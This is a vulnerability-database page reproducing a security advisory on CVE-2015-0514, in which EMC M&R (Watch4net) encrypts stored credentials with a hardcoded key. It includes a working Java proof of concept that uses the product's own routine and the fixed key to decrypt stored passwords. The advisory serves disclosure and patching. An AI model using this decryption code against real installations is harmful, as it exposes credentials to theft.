Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

EMC M&R (Watch4net) Insecure Credential Storage

Related Vulnerabilities: CVE-2015-0514  
Publish Date: 19 Mar 2015
Author: Han Sahin
Source 
                							

                ------------------------------------------------------------------------
EMC M&R (Watch4net) data storage collector credentials are not properly
protected
------------------------------------------------------------------------
Han Sahin, November 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that EMC M&R (Watch4net) credentials of remote servers
stored in Watch4net are encrypted using a fixed hardcoded password. If
an attacker manages to obtain a copy of the encrypted credentials, it is
trivial to decrypt them.

------------------------------------------------------------------------
Affected products
------------------------------------------------------------------------
EMC reports that the following products are affected by this
vulnerability:

- EMC M&R (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2015-0514
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
EMC released the following updated versions that resolve this
vulnerability:

- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20141101/emc_m_r__watch4net__data_storage_collector_credentials_are_not_properly_protected.html

Due to insecure use of cryptography the credentials of these remote host can be decrypted using the Java class com.watch4net.apg.v2.common.config.tools.Utils.process().

Proof of concept

import com.watch4net.apg.v2.common.config.tools.Utils;

public class Watch4NetCrypt {
   private static void print(String out) {
      System.out.println(out);
   }

   private static void usage() {
      print("Usage:\t watch4netcrypt [-e] password");
      print("\t watch4netcrypt [-d] encrypted");
      System.exit(1);
   }

   public static void main(String[] args) {
      if (args.length != 2 || !("-e".equals(args[0]) || "-d".equals(args[0]))) {
         usage();
      }
      Boolean encrypt = "-e".equals(args[0]);
      String password = args[1];
      if (password != null) {
         print(Utils.process(password, encrypt, "centralized", null));
      }
}
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started